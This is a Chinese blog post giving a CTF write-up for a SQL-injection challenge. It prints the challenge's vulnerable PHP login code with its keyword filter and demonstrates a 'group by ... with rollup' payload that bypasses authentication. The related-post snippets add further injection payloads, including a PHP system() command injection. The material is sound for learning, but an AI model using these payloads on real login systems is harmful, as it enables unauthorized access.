实验吧 因缺思汀的绕过 By Assassin(with rollup统计)

于 2017-01-29 10:10:31 发布 6796 收藏 3
分类专栏: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35078631/article/details/54772798
版权

这个题目还是比较新鲜的,很久没回实验吧了学到了很多的姿势~不得不说不看提示真心想不到这些,嗯。

首先我们需要了解题目中php的工作原理,首先审源码得到了source.txt得到了源码,然后我们看一下源码干了什么,主要就是一个登陆认证!

<?php
error_reporting(0);

if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {
    echo '<form action="" method="post">'."<br/>";
    echo '<input name="uname" type="text"/>'."<br/>";
    echo '<input name="pwd" type="text"/>'."<br/>";
    echo '<input type="submit" />'."<br/>";
    echo '</form>'."<br/>";
    echo '<!--source: source.txt-->'."<br/>";
    die;
}

function AttackFilter($StrKey,$StrValue,$ArrReq){  
    if (is_array($StrValue)){
        $StrValue=implode($StrValue);
    }
    if (preg_match("/".$ArrReq."/is",$StrValue)==1){   
        print "姘村彲杞借垷锛屼害鍙禌鑹囷紒";
        exit();
    }
}

$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";
foreach($_POST as $key=>$value){ 
    AttackFilter($key,$value,$filter);
}

$con = mysql_connect("XXXXXX","XXXXXX","XXXXXX");
if (!$con){
    die('Could not connect: ' . mysql_error());
}
$db="XXXXXX";
mysql_select_db($db, $con);
$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";
$query = mysql_query($sql); 
if (mysql_num_rows($query) == 1) { 
    $key = mysql_fetch_array($query);
    if($key['pwd'] == $_POST['pwd']) {
        print "CTF{XXXXXX}";
    }else{
        print "浜﹀彲璧涜墖锛?";
    }
}else{
    print "涓€棰楄禌鑹囷紒";
}
mysql_close($con);
?>

可以看到主要是
$filter = “and|select|from|where|union|join|sleep|benchmark|,|(|)”;
这句话过滤了很多关键词,加上function AttackFilter这个函数起到了过滤的作用,这里是巧妙地用了select过程中​​用group by with rollup这个统计的方法进行插入查询。我们用mysql做几个小实验就明白这个是怎么用的了!

mysql> create table test (
    -> user varchar(100) not null,
    -> pwd varchar(100) not null);  
mysql>insert into test values("admin","mypass");
mysql>select * from test group by pwd with rollup
mysql> select * from test group by pwd with rollup;
+-------+------------+
| user  | pwd        |
+-------+------------+
| guest | alsomypass |
| admin | mypass     |
| admin | NULL       |
+-------+------------+
3 rows in set

mysql> select * from test group by pwd with rollup limit 1
;
+-------+------------+
| user  | pwd        |
+-------+------------+
| guest | alsomypass |
+-------+------------+
mysql> select * from test group by pwd with rollup limit 1 offset 0
;
+-------+------------+
| user  | pwd        |
+-------+------------+
| guest | alsomypass |
+-------+------------+
1 row in set
mysql> select * from test group by pwd with rollup limit 1 offset 1
;
+-------+--------+
| user  | pwd    |
+-------+--------+
| admin | mypass |
+-------+--------+
1 row in set
mysql> select * from test group by pwd with rollup limit 1 offset 2
;
+-------+------+
| user  | pwd  |
+-------+------+
| admin | NULL |
+-------+------+
1 row in set

哎,然后我们就看到关键了,这个查询的时候可以想办法
让pwd变成空,而且user这一列用的却是也是存在的字段!
这就很好用了!又有if (mysql_num_rows($query) == 1)知道只要一列

然后我们构造payload
’ or 1=1 group by pwd with rollup limit 1 offset XX#
然后一个试出来就行啦。涨姿势!
这是第二届北京网络安全技术大赛夺旗赛Writeup(Web安全篇)​的一个题目

Assassin__is__me
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
ctfshow web(日志注入&简单回显盲注&&with rollup注入绕过)
weixin_63231007的博客
05-25 447
web3 <?php include($_GET['url']);?> php伪协议的标志。没有提示我们flag在哪个文件,filter试一下flag.php,flag,txt,flag都没有 用php://input试一下,burp抓包 发现了ctf_go_go_go,应该就是我们的flag文件。 post 传入 <?php system('cat ctf_go_go_go'); ?> cat一下,得到flag。 web4 include()函数包含的文件会被
ctf中的php代码审计
qq_40273198的博客
05-04 2729
做ctf题时,遇到审计题时可能会遇到,翻翻记录可以很快的找到脑洞。1.PHP$flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'ctf{xxx}'; }...
CTF-实验因缺思汀绕过
才不是小弱鸡的博客
05-07 407
web题嘛,第一步肯定是看源码。f12后发现这样一些奇怪的东东接下来肯定是打开这个文件嘛打开后就看到了php源码啦(是不是很开心!)分析一下源码可以看到这里过滤了一些sql语句(嗯,这些东西接下来不能用了)这里的意思大概是选择操作的数据库为db(数据库看不到QAQ)然后将咱们输入的uname在数据库查询uname和key,再将key和咱们输入的pwd比对,相等就打印flag。然后就要用一个注入的小...
实验吧-因缺思汀绕过WriteUp
焚卷觅光的博客
07-22 2976
实验吧-因缺思汀绕过WriteUp题目地址:http://www.shiyanbar.com/ctf/1940审计网页代码,发现有一个注释:<!--source: source.txt--> 访问同目录下的source.txt 发现登陆的逻辑代码,下面就可以针对它进行绕过。! 这里有三层限制0X00在第一层的filter里面就过滤了常用的SQL关键词,所以常规的SQL 注入就不行了。如
HITCTF2018-web全题解
合天网安学院
02-07 1628
点击蓝字关注我们前记最近参加了一下哈工大办的HITCTF,感觉题目可以学到知识,于是分享一下我的题解~01PHPreading发现文件泄露http://198.13.58.35:8899...
因缺思汀绕过
3569
02-22 1933
阅读源码知道 保证查找内容可控就可以进行绕过 类似 union select 1,2 然后密码填写 2 题目源码 <?php error_reporting(0); if (!isset($_POST['uname']) || !isset($_POST['pwd'])) { echo ''.""; echo ''.""; echo ''.""; echo ''."
SQL注入_WITH ROLLUP绕过
giun的博客
04-09 824
题目地址 http://ctf5.shiyanbar.com/web/pcat/index.php <?php error_reporting(0); if (!isset($_POST['uname']) || !isset($_POST['pwd'])) { echo '<form action="" method="post">'....
2020年第二届“网鼎杯”网络安全大赛 白虎组 部分题目Writeup
jameswhite2417的博客
05-16 7509
2020年第二届“网鼎杯”网络安全大赛 白虎组 部分题目Writeup 2020年网鼎杯白虎组赛题.zip下载 https://download.csdn.net/download/jameswhite2417/12421267 0x00 签到操作内容: 完成游戏,通过第7关,让提交队伍token值 提交后获得flag 通过qq截图,文字识别 FLAG值: flag{f6e5************************3112} 0x01 hidden操作内容:..
实验吧 who are you? By Assassin 时间盲注
Assassin
01-29 6695
说真的这是我第一次接触时间盲注,而且这还是简单的时间盲注…不过感觉题目还是有一定难度的。首先我们看到原始网页显示your ip is :xxx.xxx.xxx.xxx。然后可以联想是http头注入,当然了我之前只会X-FORWARDED-FOR,查看资料貌似还可以用:Client-IP x-remote-IP x-originating-IP x-remote-addr 但是这里当然是还是用X-FO
CTF---Web入门第六题 因缺思汀绕过
weixin_34370347的博客
11-08 139
因缺思汀绕过分值:20 来源: pcat 难度:中 参与人数:6479人 Get Flag:2002人 答题人数:2197人 解题通过率:91% 访问解题链接去访问题目,可以进行答题。根据web题一般解题思路去解答此题。看源码,请求,响应等。提交与题目要求一致的内容即可返回flag。然后提交正确的flag即可得分。web题主要考察SQ...
实验吧 web题--代码审计类
yisosooo的博客
09-06 1580
1、因缺思汀绕过
buu-[RootersCTF2019]babyWeb
最新发布
qaq517384的博客
10-26 269
打开环境,要输对18位数字才能下一步 给了被过滤的字符 UNION|SLEEP|’|"|OR|-|BENCHMARK 在输入一个id后,会返回sql语句 惯例先试万能密码,or过滤了还有and、&&、|| 1||1=1 limit 0,1 有了,不加limit没结果, 做完题瞅一眼源码 <?php $link = mysqli_connect("database", "root", "password", "sql_injection"); if (!$link) { ec
[RootersCTF2019]babyWeb
cjdgg的博客
07-09 229
[RootersCTF2019]babyWeb 进入环境如下 他已经提示SQL查询,过滤了:union、sleep、’、"、or、-、benchmark 我们用order by测试字段数 我们发现order by 1和order by 2都是正常显示,到了order by 3就如下报错,说明只有两段,一个为uniqueid另一个应该就是flag 那么应该就是输入id判断登录,即可,尝试万能密码登录:1 || 1=1 limit 0,1 拿到flag ...
实验吧——因缺思汀绕过(sql with rollup)
weixin_30696427的博客
10-09 98
题目地址:http://ctf5.shiyanbar.com/web/pcat/index.php 通读源码,得知出flag的条件 1.需要post提交uname以及pwd,否则直接die了 1 if (!isset($_POST['uname']) || !isset($_POST['pwd'])) { 2 echo '<form action="" method...
实验因缺思汀绕过
windseraph2的博客
05-13 464
解题连接http://ctf5.shiyanbar.com/web/pcat/index.php  查看源代码   action="" method="post"><input name="uname" type="text"/><input name="pwd" type="text"/><input type="submit" /> 查
BUUCTF:[RootersCTF2019]babyWeb
末初 · mochu7
08-02 1236
题目地址:https://buuoj.cn/challenges#[RootersCTF2019]babyWeb SQL查询,过滤了:union、sleep、'、"、or、-、benchmark order by测试字段数,发现当order by 2时返回正常order by 3返回没有这个字段,确定为两个字段,一个为uniqueid另一个应该就是flag 那么应该就是输入id判断登录,即可,尝试万能密码登录:1 || 1=1 limit 0,1 返回flag ...
BUUCTF--[RootersCTF2019]babyWeb
qq_46263951的博客
07-29 170
进入页面发现有个搜索框,尝试SQL注入测试,闭合时并没有反映,测试一下过滤的内容 SQL查询,过滤了:union、sleep、'、"、or、-、benchmark 利用order by探测有2个字段 尝试利用万能密钥登录: 1 || 1=1 limit 0,1limit在这里的作用是显示第一行内容 ...
CTF之懵懂时期系列---因缺思汀绕过
nini_boom的博客
04-07 327
题目链接:http://ctf5.shiyanbar.com/web/pcat/index.php 这道题严格来说,我只解了一半,考点在于源码分析、group by with rollup、关键字绕过. 这一篇的文章和之前ctf系列的不一样,之前的都是学习,反推别人的思路,这次以自己的思路为博客的主线。 一、发现源码 右键查看网页源代码(ctf是否有意培养我们这样的习惯?) source....
CTF解题笔记(1)
热门推荐
CODING...
01-09 1万+
因缺思汀绕过 解题路径:http://ctf5.shiyanbar.com/web/pcat/index.php 打开后是一个登录框类似的东西,查看页面源码可以看到有source:source.txt的字样 打开连接:http://ctf5.shiyanbar.com/web/pcat/source.txt 可以看到登录的php逻辑: <?php error_rep

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Assassin__is__me

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值